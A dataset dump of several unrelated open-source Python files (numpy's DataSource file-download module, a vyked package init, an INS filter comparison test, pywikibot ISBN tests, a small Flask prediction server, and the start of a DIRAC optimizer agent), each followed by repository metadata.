gzip, bz2 and xz are supported.
Example::
>>> # Create a DataSource, use os.curdir (default) for local storage.
>>> from numpy import DataSource
>>> ds = DataSource()
>>>
>>> # Open a remote file.
>>> # DataSource downloads the file, stores it locally in:
>>> # './www.google.com/index.html'
>>> # opens the file and returns a file object.
>>> fp = ds.open('http://www.google.com/') # doctest: +SKIP
>>>
>>> # Use the file as you normally would
>>> fp.read() # doctest: +SKIP
>>> fp.close() # doctest: +SKIP
"""
import os
import shutil
import io
from contextlib import closing
from numpy.core.overrides import set_module
_open = open
def _check_mode(mode, encoding, newline):
"""Check mode and that encoding and newline are compatible.
Parameters
----------
mode : str
File open mode.
encoding : str
File encoding.
newline : str
Newline for text files.
"""
if "t" in mode:
if "b" in mode:
raise ValueError("Invalid mode: %r" % (mode,))
else:
if encoding is not None:
raise ValueError("Argument 'encoding' not supported in binary mode")
if newline is not None:
raise ValueError("Argument 'newline' not supported in binary mode")
# Using a class instead of a module-level dictionary
# to reduce the initial 'import numpy' overhead by
# deferring the import of lzma, bz2 and gzip until needed
# TODO: .zip support, .tar support?
class _FileOpeners:
"""
Container for different methods to open (un-)compressed files.
`_FileOpeners` contains a dictionary that holds one method for each
supported file format. Attribute lookup is implemented in such a way
that an instance of `_FileOpeners` itself can be indexed with the keys
of that dictionary. Currently uncompressed files as well as files
compressed with ``gzip``, ``bz2`` or ``xz`` compression are supported.
Notes
-----
`_file_openers`, an instance of `_FileOpeners`, is made available for
use in the `_datasource` module.
Examples
--------
>>> import gzip
>>> np.lib._datasource._file_openers.keys()
[None, '.bz2', '.gz', '.xz', '.lzma']
>>> np.lib._datasource._file_openers['.gz'] is gzip.open
True
"""
def __init__(self):
self._loaded = False
self._file_openers = {None: io.open}
def _load(self):
if self._loaded:
return
try:
import bz2
self._file_openers[".bz2"] = bz2.open
except ImportError:
pass
try:
import gzip
self._file_openers[".gz"] = gzip.open
except ImportError:
pass
try:
import lzma
self._file_openers[".xz"] = lzma.open
self._file_openers[".lzma"] = lzma.open
except (ImportError, AttributeError):
# There are incompatible backports of lzma that do not have the
# lzma.open attribute, so catch that as well as ImportError.
pass
self._loaded = True
def keys(self):
"""
Return the keys of currently supported file openers.
Parameters
----------
None
Returns
-------
keys : list
The keys are None for uncompressed files and the file extension
strings (i.e. ``'.gz'``, ``'.xz'``) for supported compression
methods.
"""
self._load()
return list(self._file_openers.keys())
def __getitem__(self, key):
self._load()
return self._file_openers[key]
_file_openers = _FileOpeners()
def open(path, mode='r', destpath=os.curdir, encoding=None, newline=None):
"""
Open `path` with `mode` and return the file object.
If ``path`` is an URL, it will be downloaded, stored in the
`DataSource` `destpath` directory and opened from there.
Parameters
----------
path : str
Local file path or URL to open.
mode : str, optional
Mode to open `path`. Mode 'r' for reading, 'w' for writing, 'a' to
append. Available modes depend on the type of object specified by
path. Default is 'r'.
destpath : str, optional
Path to the directory where the source file gets downloaded to for
use. If `destpath` is None, a temporary directory will be created.
The default path is the current directory.
encoding : {None, str}, optional
Open text file with given encoding. The default encoding will be
what `io.open` uses.
newline : {None, str}, optional
Newline to use when reading text file.
Returns
-------
out : file object
The opened file.
Notes
-----
This is a convenience function that instantiates a `DataSource` and
returns the file object from ``DataSource.open(path)``.
"""
ds = DataSource(destpath)
return ds.open(path, mode, encoding=encoding, newline=newline)
@set_module('numpy')
class DataSource:
"""
DataSource(destpath='.')
A generic data source file (file, http, ftp, ...).
DataSources can be local files or remote files/URLs. The files may
also be compressed or uncompressed. DataSource hides some of the
low-level details of downloading the file, allowing you to simply pass
in a valid file path (or URL) and obtain a file object.
Parameters
----------
destpath : str or None, optional
Path to the directory where the source file gets downloaded to for
use. If `destpath` is None, a temporary directory will be created.
The default path is the current directory.
Notes
-----
URLs require a scheme string (``http://``) to be used, without it they
will fail::
>>> repos = np.DataSource()
>>> repos.exists('www.google.com/index.html')
False
>>> repos.exists('http://www.google.com/index.html')
True
Temporary directories are deleted when the DataSource is deleted.
Examples
--------
::
>>> ds = np.DataSource('/home/guido')
>>> urlname = 'http://www.google.com/'
>>> gfile = ds.open('http://www.google.com/')
>>> ds.abspath(urlname)
'/home/guido/www.google.com/index.html'
>>> ds = np.DataSource(None) # use with temporary file
>>> ds.open('/home/guido/foobar.txt')
<open file '/home/guido.foobar.txt', mode 'r' at 0x91d4430>
>>> ds.abspath('/home/guido/foobar.txt')
'/tmp/.../home/guido/foobar.txt'
"""
def __init__(self, destpath=os.curdir):
"""Create a DataSource with a local path at destpath."""
if destpath:
self._destpath = os.path.abspath(destpath)
self._istmpdest = False
else:
import tempfile # deferring import to improve startup time
self._destpath = tempfile.mkdtemp()
self._istmpdest = True
def __del__(self):
# Remove temp directories
if hasattr(self, '_istmpdest') and self._istmpdest:
shutil.rmtree(self._destpath)
def _iszip(self, filename):
"""Test if the filename is a zip file by looking at the file extension.
"""
fname, ext = os.path.splitext(filename)
return ext in _file_openers.keys()
def _iswritemode(self, mode):
"""Test if the given mode will open a file for writing."""
# Currently only used to test the bz2 files.
_writemodes = ("w", "+")
for c in mode:
if c in _writemodes:
return True
return False
def _splitzipext(self, filename):
"""Split zip extension from filename and return filename.
*Returns*:
base, zip_ext : {tuple}
"""
if self._iszip(filename):
return os.path.splitext(filename)
else:
return filename, None
def _possible_names(self, filename):
"""Return a tuple containing compressed filename variations."""
names = [filename]
if not self._iszip(filename):
for zipext in _file_openers.keys():
if zipext:
names.append(filename+zipext)
return names
def _isurl(self, path):
"""Test if path is a net location. Tests the scheme and netloc."""
# We do this here to reduce the 'import numpy' initial import time.
from urllib.parse import urlparse
# BUG : URLs require a scheme string ('http://') to be used.
# www.google.com will fail.
# Should we prepend the scheme for those that don't have it and
# test that also? Similar to the way we append .gz and test for
# for compressed versions of files.
scheme, netloc, upath, uparams, uquery, ufrag = urlparse(path)
return bool(scheme and netloc)
def _cache(self, path):
"""Cache the file specified by path.
Creates a copy of the file in the datasource cache.
"""
# We import these here because importing urllib is slow and
# a significant fraction of numpy's total import time.
from urllib.request import urlopen
from urllib.error import URLError
upath = self.abspath(path)
# ensure directory exists
if not os.path.exists(os.path.dirname(upath)):
os.makedirs(os.path.dirname(upath))
# TODO: Doesn't handle compressed files!
if self._isurl(path):
try:
with closing(urlopen(path)) as openedurl:
with _open(upath, 'wb') as f:
shutil.copyfileobj(openedurl, f)
except URLError:
raise URLError("URL not found: %s" % path)
else:
shutil.copyfile(path, upath)
return upath
def _findfile(self, path):
"""Searches for ``path`` and returns full path if found.
If path is an URL, _findfile will cache a local copy and return the
path to the cached file. If path is a local file, _findfile will
return a path to that local file.
The search will include possible compressed versions of the file
and return the first occurrence found.
"""
# Build list of possible local file paths
if not self._isurl(path):
# Valid local paths
filelist = self._possible_names(path)
# Paths in self._destpath
filelist += self._possible_names(self.abspath(path))
else:
# Cached URLs in self._destpath
filelist = self._possible_names(self.abspath(path))
# Remote URLs
filelist = filelist + self._possible_names(path)
for name in filelist:
if self.exists(name):
if self._isurl(name):
name = self._cache(name)
return name
return None
def abspath(self, path):
"""
Return absolute path of file in the DataSource directory.
If `path` is an URL, then `abspath` will return either the location
the file exists locally or the location it would exist when opened
using the `open` method.
Parameters
----------
path : str
Can be a local file or a remote URL.
Returns
-------
out : str
Complete path, including the `DataSource` destination directory.
Notes
-----
The functionality is based on `os.path.abspath`.
"""
# We do this here to reduce the 'import numpy' initial import time.
from urllib.parse import urlparse
# TODO: This should be more robust. Handles case where path includes
# the destpath, but not other sub-paths. Failing case:
# path = /home/guido/datafile.txt
# destpath = /home/alex/
# upath = self.abspath(path)
# upath == '/home/alex/home/guido/datafile.txt'
# handle case where path includes self._destpath
splitpath = path.split(self._destpath, 2)
if len(splitpath) > 1:
path = splitpath[1]
scheme, netloc, upath, uparams, uquery, ufrag = urlparse(path)
netloc = self._sanitize_relative_path(netloc)
upath = self._sanitize_relative_path(upath)
return os.path.join(self._destpath, netloc, upath)
def _sanitize_relative_path(self, path):
"""Return a sanitised relative path for which
os.path.abspath(os.path.join(base, path)).startswith(base)
"""
last = None
path = os.path.normpath(path)
while path != last:
last = path
# Note: os.path.join treats '/' as os.sep on Windows
path = path.lstrip(os.sep).lstrip('/')
path = path.lstrip(os.pardir).lstrip('..')
drive, path = os.path.splitdrive(path) # for Windows
return path
def exists(self, path):
"""
Test if path exists.
Test if `path` exists as (and in this order):
- a local file.
- a remote URL that has been downloaded and stored locally in the
`DataSource` directory.
- a remote URL that has not been downloaded, but is valid and
accessible.
Parameters
----------
path : str
Can be a local file or a remote URL.
Returns
-------
out : bool
True if `path` exists.
Notes
-----
When `path` is an URL, `exists` will return True if it's either
stored locally in the `DataSource` directory, or is a valid remote
URL. `DataSource` does not discriminate between the two, the file
is accessible if it exists in either location.
"""
# First test for local path
if os.path.exists(path):
return True
# We import this here because importing urllib is slow and
# a significant fraction of numpy's total import time.
from urllib.request import urlopen
from urllib.error import URLError
# Test cached url
upath = self.abspath(path)
if os.path.exists(upath):
return True
# Test remote url
if self._isurl(path):
try:
netfile = urlopen(path)
netfile.close()
del(netfile)
return True
except URLError:
return False
return False
def open(self, path, mode='r', encoding=None, newline=None):
"""
Open and return file-like object.
If `path` is an URL, it will be downloaded, stored in the
`DataSource` directory and opened from there.
Parameters
----------
path : str
Local file path or URL to open.
mode : {'r', 'w', 'a'}, optional
Mode to open `path`. Mode 'r' for reading, 'w' for writing,
'a' to append. Available modes depend on the type of object
specified by `path`. Default is 'r'.
encoding : {None, str}, optional
Open text file with given encoding. The default encoding will be
what `io.open` uses.
newline : {None, str}, optional
Newline to use when reading text file.
Returns
-------
out : file object
File object.
"""
# TODO: There is no support for opening a file for writing which
# doesn't exist yet (creating a file). Should there be?
# TODO: Add a ``subdir`` parameter for specifying the subdirectory
# used to store URLs in self._destpath.
if self._isurl(path) and self._iswritemode(mode):
raise ValueError("URLs are not writeable")
# NOTE: _findfile will fail on a new file opened for writing.
found = self._findfile(path)
if found:
_fname, ext = self._splitzipext(found)
if ext == 'bz2':
mode.replace("+", "")
return _file_openers[ext](found, mode=mode,
encoding=encoding, newline=newline)
else:
raise IOError("%s not found." % path)
class Repository (DataSource):
"""
Repository(baseurl, destpath='.')
A data repository where multiple DataSource's share a base
URL/directory.
`Repository` extends `DataSource` by prepending a base URL (or
directory) to all the files it handles. Use `Repository` when you will
be working with multiple files from one base URL. Initialize
`Repository` with the base URL, then refer to each file by its filename
only.
Parameters
----------
baseurl : str
Path to the local directory or remote location that contains the
data files.
destpath : str or None, optional
Path to the directory where the source file gets downloaded to for
use. If `destpath` is None, a temporary directory will be created.
The default path is the current directory.
Examples
--------
To analyze all files in the repository, do something like this
(note: this is not self-contained code)::
>>> repos = np.lib._datasource.Repository('/home/user/data/dir/')
>>> for filename in filelist:
... fp = repos.open(filename)
... fp.analyze()
... fp.close()
Similarly you could use a URL for a repository::
>>> repos = np.lib._datasource.Repository('http://www.xyz.edu/data')
"""
def __init__(self, baseurl, destpath=os.curdir):
"""Create a Repository with a shared url or directory of baseurl."""
DataSource.__init__(self, destpath=destpath)
self._baseurl = baseurl
def __del__(self):
DataSource.__del__(self)
def _fullpath(self, path):
"""Return complete path for path. Prepends baseurl if necessary."""
splitpath = path.split(self._baseurl, 2)
if len(splitpath) == 1:
result = os.path.join(self._baseurl, path)
else:
result = path # path contains baseurl already
return result
def _findfile(self, path):
"""Extend DataSource method to prepend baseurl to ``path``."""
return DataSource._findfile(self, self._fullpath(path))
def abspath(self, path):
"""
Return absolute path of file in the Repository directory.
If `path` is an URL, then `abspath` will return either the location
the file exists locally or the location it would exist when opened
using the `open` method.
Parameters
----------
path : str
Can be a local file or a remote URL. This may, but does not
have to, include the `baseurl` with which the `Repository` was
initialized.
Returns
-------
out : str
Complete path, including the `DataSource` destination directory.
"""
return DataSource.abspath(self, self._fullpath(path))
def exists(self, path):
"""
Test if path exists prepending Repository base URL to path.
Test if `path` exists as (and in this order):
- a local file.
- a remote URL that has been downloaded and stored locally in the
`DataSource` directory.
- a remote URL that has not been downloaded, but is valid and
accessible.
Parameters
----------
path : str
Can be a local file or a remote URL. This may, but does not
have to, include the `baseurl` with which the `Repository` was
initialized.
Returns
-------
out : bool
True if `path` exists.
Notes
-----
When `path` is an URL, `exists` will return True if it's either
stored locally in the `DataSource` directory, or is a valid remote
URL. `DataSource` does not discriminate between the two, the file
is accessible if it exists in either location.
"""
return DataSource.exists(self, self._fullpath(path))
def open(self, path, mode='r', encoding=None, newline=None):
"""
Open and return file-like object prepending Repository base URL.
If `path` is an URL, it will be downloaded, stored in the
DataSource directory and opened from there.
Parameters
----------
path : str
Local file path or URL to open. This may, but does not have to,
include the `baseurl` with which the `Repository` was
initialized.
mode : {'r', 'w', 'a'}, optional
Mode to open `path`. Mode 'r' for reading, 'w' for writing,
'a' to append. Available modes depend on the type of object
specified by `path`. Default is 'r'.
encoding : {None, str}, optional
Open text file with given encoding. The default encoding will be
what `io.open` uses.
newline : {None, str}, optional
Newline to use when reading text file.
Returns
-------
out : file object
File object.
"""
return DataSource.open(self, self._fullpath(path), mode,
encoding=encoding, newline=newline)
def listdir(self):
"""
List files in the source Repository.
Returns
-------
files : list of str
List of file names (not containing a directory part).
Notes
-----
Does not currently work for remote repositories.
"""
if self._isurl(self._baseurl):
raise NotImplementedError(
"Directory listing of URLs, not supported yet.")
else:
return os.listdir(self._baseurl)
| bsd-3-clause | -2,557,301,246,969,299,500 | 31.283286 | 80 | 0.584591 | false |
amanwriter/vyked | vyked/__init__.py | 1 | 1035 | __all__ = ['Host', 'TCPServiceClient', 'TCPService', 'HTTPService', 'HTTPServiceClient', 'api', 'request', 'subscribe',
'publish', 'xsubscribe', 'get', 'post', 'head', 'put', 'patch', 'delete', 'options', 'trace',
'Registry', 'RequestException', 'Response', 'Request', 'log', 'setup_logging',
'deprecated', 'VykedServiceException', 'VykedServiceError', '__version__', 'enqueue', 'task_queue']
from .host import Host # noqa
from .services import (TCPService, HTTPService, HTTPServiceClient, TCPServiceClient) # noqa
from .decorators.http import (get, post, head, put, patch, delete, options, trace) # noqa
from .decorators.tcp import (api, request, subscribe, publish, xsubscribe, deprecated, enqueue, task_queue) # noqa
from .registry import Registry # noqa
from .utils import log # noqa
from .exceptions import RequestException, VykedServiceError, VykedServiceException # noqa
from .utils.log import setup_logging # noqa
from .wrappers import Response, Request # noqa
__version__ = '2.4.3'
| mit | 6,902,178,428,097,031,000 | 63.6875 | 119 | 0.697585 | false |
jpbarraca/dRonin | python/ins/compare.py | 11 | 5497 | from cins import CINS
from pyins import PyINS
import unittest
from sympy import symbols, lambdify, sqrt
from sympy import MatrixSymbol, Matrix
from numpy import cos, sin, power
from sympy.matrices import *
from quaternions import *
import numpy
import math
import ins
VISUALIZE = False
class CompareFunctions(unittest.TestCase):
def setUp(self):
self.c_sim = CINS()
self.py_sim = PyINS()
self.c_sim.prepare()
self.py_sim.prepare()
def run_static(self, accel=[0.0,0.0,-PyINS.GRAV],
gyro=[0.0,0.0,0.0], mag=[400,0,1600],
pos=[0,0,0], vel=[0,0,0],
noise=False, STEPS=200000):
""" simulate a static set of inputs and measurements
"""
c_sim = self.c_sim
py_sim = self.py_sim
dT = 1.0 / 666.0
numpy.random.seed(1)
c_history = numpy.zeros((STEPS,16))
c_history_rpy = numpy.zeros((STEPS,3))
py_history = numpy.zeros((STEPS,16))
py_history_rpy = numpy.zeros((STEPS,3))
times = numpy.zeros((STEPS,1))
for k in range(STEPS):
print `k`
ng = numpy.zeros(3,)
na = numpy.zeros(3,)
np = numpy.zeros(3,)
nv = numpy.zeros(3,)
nm = numpy.zeros(3,)
if noise:
ng = numpy.random.randn(3,) * 1e-3
na = numpy.random.randn(3,) * 1e-3
np = numpy.random.randn(3,) * 1e-3
nv = numpy.random.randn(3,) * 1e-3
nm = numpy.random.randn(3,) * 10.0
c_sim.predict(gyro+ng, accel+na, dT=dT)
py_sim.predict(gyro+ng, accel+na, dT=dT)
times[k] = k * dT
c_history[k,:] = c_sim.state
c_history_rpy[k,:] = quat_rpy(c_sim.state[6:10])
py_history[k,:] = py_sim.state
py_history_rpy[k,:] = quat_rpy(py_sim.state[6:10])
if False and k % 60 == 59:
c_sim.correction(pos=pos+np)
py_sim.correction(pos=pos+np)
if False and k % 60 == 59:
c_sim.correction(vel=vel+nv)
py_sim.correction(vel=vel+nv)
if True and k % 20 == 8:
c_sim.correction(baro=-pos[2]+np[2])
py_sim.correction(baro=-pos[2]+np[2])
if True and k % 20 == 15:
c_sim.correction(mag=mag+nm)
py_sim.correction(mag=mag+nm)
self.assertState(c_sim.state, py_sim.state)
if VISUALIZE:
from numpy import cos, sin
import matplotlib.pyplot as plt
fig, ax = plt.subplots(2,2)
k = STEPS
ax[0][0].cla()
ax[0][0].plot(times[0:k:4],c_history[0:k:4,0:3])
ax[0][0].set_title('Position')
plt.sca(ax[0][0])
plt.ylabel('m')
ax[0][1].cla()
ax[0][1].plot(times[0:k:4],c_history[0:k:4,3:6])
ax[0][1].set_title('Velocity')
plt.sca(ax[0][1])
plt.ylabel('m/s')
#plt.ylim(-2,2)
ax[1][0].cla()
ax[1][0].plot(times[0:k:4],c_history_rpy[0:k:4,:])
ax[1][0].set_title('Attitude')
plt.sca(ax[1][0])
plt.ylabel('Angle (Deg)')
plt.xlabel('Time (s)')
#plt.ylim(-1.1,1.1)
ax[1][1].cla()
ax[1][1].plot(times[0:k:4],c_history[0:k:4,10:])
ax[1][1].set_title('Biases')
plt.sca(ax[1][1])
plt.ylabel('Bias (rad/s)')
plt.xlabel('Time (s)')
plt.suptitle(unittest.TestCase.shortDescription(self))
plt.show()
return sim.state, history, times
def assertState(self, c_state, py_state):
""" check that the state is near a desired position
"""
# check position
self.assertAlmostEqual(c_state[0],py_state[0],places=1)
self.assertAlmostEqual(c_state[1],py_state[1],places=1)
self.assertAlmostEqual(c_state[2],py_state[2],places=1)
# check velocity
self.assertAlmostEqual(c_state[3],py_state[3],places=1)
self.assertAlmostEqual(c_state[4],py_state[4],places=1)
self.assertAlmostEqual(c_state[5],py_state[5],places=1)
# check attitude
self.assertAlmostEqual(c_state[0],py_state[0],places=0)
self.assertAlmostEqual(c_state[1],py_state[1],places=0)
self.assertAlmostEqual(c_state[2],py_state[2],places=0)
self.assertAlmostEqual(c_state[3],py_state[3],places=0)
# check bias terms (gyros and accels)
self.assertAlmostEqual(c_state[10],py_state[10],places=2)
self.assertAlmostEqual(c_state[11],py_state[11],places=2)
self.assertAlmostEqual(c_state[12],py_state[12],places=2)
self.assertAlmostEqual(c_state[13],py_state[13],places=2)
self.assertAlmostEqual(c_state[14],py_state[14],places=2)
self.assertAlmostEqual(c_state[15],py_state[15],places=2)
def test_face_west(self):
""" test convergence to face west
"""
mag = [0,-400,1600]
state, history, times = self.run_static(mag=mag, STEPS=50000)
self.assertState(state,rpy=[0,0,90])
if __name__ == '__main__':
selected_test = None
if selected_test is not None:
VISUALIZE = True
suite = unittest.TestSuite()
suite.addTest(CompareFunctions(selected_test))
unittest.TextTestRunner().run(suite)
else:
unittest.main() | gpl-3.0 | 5,129,304,335,787,355,000 | 30.780347 | 69 | 0.538112 | false |
TridevGuha/pywikibot-core | tests/isbn_tests.py | 2 | 8730 | # -*- coding: utf-8 -*-
"""Tests for isbn script."""
#
# (C) Pywikibot team, 2014-2015
#
# Distributed under the terms of the MIT license.
#
from __future__ import unicode_literals
import pywikibot
__version__ = '$Id$'
from pywikibot import Bot, Claim, ItemPage
from pywikibot.cosmetic_changes import CosmeticChangesToolkit, CANCEL_MATCH
from scripts.isbn import (
ISBN10, ISBN13, InvalidIsbnException as IsbnExc,
getIsbn, hyphenateIsbnNumbers, convertIsbn10toIsbn13,
main
)
from tests.aspects import (
unittest, TestCase, DefaultDrySiteTestCase,
WikibaseTestCase, ScriptMainTestCase,
)
class TestCosmeticChangesISBN(DefaultDrySiteTestCase):
"""Test CosmeticChanges ISBN fix."""
def test_valid_isbn(self):
"""Test ISBN."""
cc = CosmeticChangesToolkit(self.site, namespace=0)
text = cc.fix_ISBN(' ISBN 097522980x ')
self.assertEqual(text, ' ISBN 0-9752298-0-X ')
text = cc.fix_ISBN(' ISBN 9780975229804 ')
self.assertEqual(text, ' ISBN 978-0-9752298-0-4 ')
def test_invalid_isbn(self):
"""Test that it'll fail when the ISBN is invalid."""
cc = CosmeticChangesToolkit(self.site, namespace=0)
self.assertRaises(Exception, cc.fix_ISBN, 'ISBN 0975229LOL') # Invalid characters
self.assertRaises(Exception, cc.fix_ISBN, 'ISBN 0975229801') # Invalid checksum
self.assertRaises(Exception, cc.fix_ISBN, 'ISBN 09752298') # Invalid length
self.assertRaises(Exception, cc.fix_ISBN, 'ISBN 09752X9801') # X in the middle
def test_ignore_invalid_isbn(self):
"""Test fixing ISBN numbers with an invalid ISBN."""
cc = CosmeticChangesToolkit(self.site, namespace=0, ignore=CANCEL_MATCH)
text = cc.fix_ISBN(' ISBN 0975229LOL ISBN 9780975229804 ')
self.assertEqual(text, ' ISBN 0975229LOL ISBN 978-0-9752298-0-4 ')
class TestIsbn(TestCase):
"""Test ISBN-related classes and helper functions."""
net = False
def test_isbn10(self):
"""Test ISBN10."""
# Test general features
isbn = ISBN10('097522980x')
isbn.format()
self.assertEqual(isbn.code, '0-9752298-0-X')
self.assertEqual(isbn.digits(),
['0', '9', '7', '5', '2', '2', '9', '8', '0', 'X'])
# Converting to ISBN13
isbn13 = isbn.toISBN13()
self.assertEqual(isbn13.code, '978-0-9752298-0-4')
# Errors
self.assertRaises(IsbnExc, ISBN10, '0975229LOL') # Invalid characters
self.assertRaises(IsbnExc, ISBN10, '0975229801') # Invalid checksum
self.assertRaises(IsbnExc, ISBN10, '09752298') # Invalid length
self.assertRaises(IsbnExc, ISBN10, '09752X9801') # X in the middle
def test_isbn13(self):
"""Test ISBN13."""
# Test general features
isbn = ISBN13('9783161484100')
isbn.format()
self.assertEqual(isbn.code, '978-3-16-148410-0')
self.assertEqual(isbn.digits(),
[9, 7, 8, 3, 1, 6, 1, 4, 8, 4, 1, 0, 0])
isbn = ISBN13('978809027341', checksumMissing=True)
self.assertEqual(isbn.code, '9788090273412')
# Errors
self.assertRaises(IsbnExc, ISBN13, '9783161484LOL') # Invalid chars
self.assertRaises(IsbnExc, ISBN13, '9783161484105') # Invalid checksum
self.assertRaises(IsbnExc, ISBN13, '9783161484') # Invalid length
def test_general(self):
"""Test things that apply both to ISBN10 and ISBN13."""
# getIsbn
self.assertIsInstance(getIsbn('097522980x'), ISBN10)
self.assertIsInstance(getIsbn('9783161484100'), ISBN13)
self.assertRaisesRegex(IsbnExc,
'ISBN-13: The ISBN 097522 is not 13 digits '
'long. / ISBN-10: The ISBN 097522 is not 10 '
'digits long.', getIsbn, '097522')
# hyphenateIsbnNumbers
self.assertEqual(hyphenateIsbnNumbers('ISBN 097522980x'),
'ISBN 0-9752298-0-X')
self.assertEqual(hyphenateIsbnNumbers('ISBN 0975229801'),
'ISBN 0975229801') # Invalid ISBN - no changes
# convertIsbn10toIsbn13
self.assertEqual(convertIsbn10toIsbn13('ISBN 0-9752298-0-X'),
'ISBN 978-0-9752298-0-4')
self.assertEqual(convertIsbn10toIsbn13('ISBN 0-9752298-0-1'),
'ISBN 0-9752298-0-1') # Invalid ISBN - no changes
# Errors
isbn = ISBN10('9492098059')
self.assertRaisesRegex(IsbnExc,
'ISBN 9492098059: group number unknown.',
isbn.format)
isbn = ISBN10('9095012042')
self.assertRaisesRegex(IsbnExc,
'ISBN 9095012042: publisher number unknown.',
isbn.format)
class TestIsbnBot(ScriptMainTestCase):
"""Test isbnbot with non-write patching (if the testpage exists)."""
family = 'test'
code = 'test'
user = True
write = True
def setUp(self):
"""Patch the Bot class to avoid an actual write."""
self._original_userPut = Bot.userPut
Bot.userPut = userPut_dummy
super(TestIsbnBot, self).setUp()
def tearDown(self):
"""Unpatch the Bot class."""
Bot.userPut = self._original_userPut
super(TestIsbnBot, self).tearDown()
def test_isbn(self):
"""Test the ISBN bot."""
site = self.get_site()
p1 = pywikibot.Page(site, 'User:M4tx/IsbnTest')
# Create the page if it does not exist
if not p1.exists() or p1.text != 'ISBN 097522980x':
p1.text = 'ISBN 097522980x'
p1.save('unit test', botflag=True)
main('-page:User:M4tx/IsbnTest', '-always', '-format', '-to13')
self.assertEqual(self.newtext, 'ISBN 978-0-9752298-0-4')
def userPut_dummy(self, page, oldtext, newtext, **kwargs):
"""Avoid that userPut writes."""
TestIsbnBot.newtext = newtext
class TestIsbnWikibaseBot(ScriptMainTestCase, WikibaseTestCase):
"""Test isbnbot on Wikibase site with non-write patching."""
family = 'wikidata'
code = 'test'
@classmethod
def setUpClass(cls):
super(TestIsbnWikibaseBot, cls).setUpClass()
# Check if the unit test item page and the property both exist
item_ns = cls.get_repo().item_namespace
for page in cls.get_site().search('IsbnWikibaseBotUnitTest', step=1,
total=1, namespaces=item_ns):
cls.test_page_qid = page.title()
item_page = ItemPage(cls.get_repo(), page.title())
for pid, claims in item_page.get()['claims'].items():
for claim in claims:
prop_page = pywikibot.PropertyPage(cls.get_repo(),
claim.getID())
prop_page.get()
if ('ISBN-10' in prop_page.labels.values() and
claim.getTarget() == '097522980x'):
return
raise unittest.SkipTest(
u'%s: "ISBN-10" property was not found in '
u'"IsbnWikibaseBotUnitTest" item page' % cls.__name__)
raise unittest.SkipTest(
u'%s: "IsbnWikibaseBotUnitTest" item page was not found'
% cls.__name__)
def setUp(self):
"""Patch Claim.setTarget and ItemPage.editEntity which write."""
TestIsbnWikibaseBot._original_setTarget = Claim.setTarget
Claim.setTarget = setTarget_dummy
TestIsbnWikibaseBot._original_editEntity = ItemPage.editEntity
ItemPage.editEntity = editEntity_dummy
super(TestIsbnWikibaseBot, self).setUp()
def tearDown(self):
"""Unpatch the dummy methods."""
Claim.setTarget = TestIsbnWikibaseBot._original_setTarget
ItemPage.editEntity = TestIsbnWikibaseBot._original_editEntity
super(TestIsbnWikibaseBot, self).tearDown()
def test_isbn(self):
"""Test using the bot and wikibase."""
main('-page:' + self.test_page_qid, '-always', '-format')
self.assertEqual(self.setTarget_value, '0-9752298-0-X')
main('-page:' + self.test_page_qid, '-always', '-to13')
self.assertTrue(self.setTarget_value, '978-0975229804')
def setTarget_dummy(self, value):
"""Avoid that setTarget writes."""
TestIsbnWikibaseBot.setTarget_value = value
TestIsbnWikibaseBot._original_setTarget(self, value)
def editEntity_dummy(self, data=None, **kwargs):
"""Avoid that editEntity writes."""
pass
if __name__ == "__main__":
unittest.main()
| mit | 1,830,913,979,204,939,000 | 35.991525 | 90 | 0.604353 | false |
tmylk/seldon-server | external/predictor/python/docker/vw_runtime/scripts/server.py | 2 | 1223 | import importlib
from flask import Flask, jsonify
from flask import request
app = Flask(__name__)
import json
import pprint
app.config.from_object('server_config')
_recs_mod = importlib.import_module(app.config['PREDICTION_ALG'])
def extract_input():
client = request.args.get('client')
j = json.loads(request.args.get('json'))
input = {
"client" : client,
"json" : j
}
return input
def format_predictions(predictions,model):
formatted_recs_list=[]
for (score,classId,confidence) in predictions:
formatted_recs_list.append({
"prediction": score,
"predictedClass": str(classId),
"confidence" : confidence
})
return { "predictions": formatted_recs_list, "model" : model }
@app.route('/predict', methods=['GET'])
def predict():
print "predict called"
input = extract_input()
print input
(recs,model) = _recs_mod.get_predictions(
input['client'],
input['json'])
print "recs returned ",recs
f=format_predictions(recs,model)
json = jsonify(f)
return json
_recs_mod.init(app.config)
app.debug = True
if __name__ == "__main__":
app.run(host="0.0.0.0", debug=True)
| apache-2.0 | -8,166,791,802,808,382,000 | 24.479167 | 66 | 0.623876 | false |
miloszz/DIRAC | WorkloadManagementSystem/Agent/ThreadedMightyOptimizer.py | 7 | 10737 | ########################################################################
# $HeadURL$
# File : ThreadedMightyOptimizer.py
# Author : Adria Casajus
########################################################################
"""
SuperOptimizer
One optimizer to rule them all, one optimizer to find them,
one optimizer to bring them all, and in the darkness bind them.
"""
__RCSID__ = "$Id$"
import time
import os
import threading
import Queue
from DIRAC import gLogger, gConfig, S_OK, S_ERROR
from DIRAC.Core.Base.AgentModule import AgentModule
from DIRAC.WorkloadManagementSystem.DB.JobDB import JobDB
from DIRAC.WorkloadManagementSystem.DB.JobLoggingDB import JobLoggingDB
from DIRAC.Core.Utilities import ThreadSafe, List
from DIRAC.Core.Utilities.Shifter import setupShifterProxyInEnv
gOptimizerLoadSync = ThreadSafe.Synchronizer()
class ThreadedMightyOptimizer( AgentModule ):
"""
The specific agents must provide the following methods:
- initialize() for initial settings
- beginExecution()
- execute() - the main method called in the agent cycle
- endExecution()
- finalize() - the graceful exit of the method, this one is usually used
for the agent restart
"""
__jobStates = [ 'Received', 'Checking' ]
__defaultValidOptimizers = [ 'WorkloadManagement/JobPath',
'WorkloadManagement/JobSanity',
'WorkloadManagement/JobScheduling',
'WorkloadManagement/TaskQueue',
]
def initialize( self ):
""" Standard constructor
"""
self.jobDB = JobDB()
self.jobLoggingDB = JobLoggingDB()
self._optimizingJobs = JobsInTheWorks()
self._optimizers = {}
self._threadedOptimizers = {}
self.am_setOption( "PollingTime", 30 )
return S_OK()
def execute( self ):
""" Standard Agent module execute method
"""
#Get jobs from DB
result = self.jobDB.selectJobs( { 'Status': self.__jobStates } )
if not result[ 'OK' ]:
gLogger.error( "Cannot retrieve jobs in states %s" % self.__jobStates )
return result
jobsList = result[ 'Value' ]
for i in range( len( jobsList ) ):
jobsList[i] = int( jobsList[i] )
jobsList.sort()
self.log.info( "Got %s jobs for this iteration" % len( jobsList ) )
if not jobsList: return S_OK()
#Check jobs that are already being optimized
newJobsList = self._optimizingJobs.addJobs( jobsList )
if not newJobsList:
return S_OK()
#Get attrs of jobs to be optimized
result = self.jobDB.getAttributesForJobList( newJobsList )
if not result[ 'OK' ]:
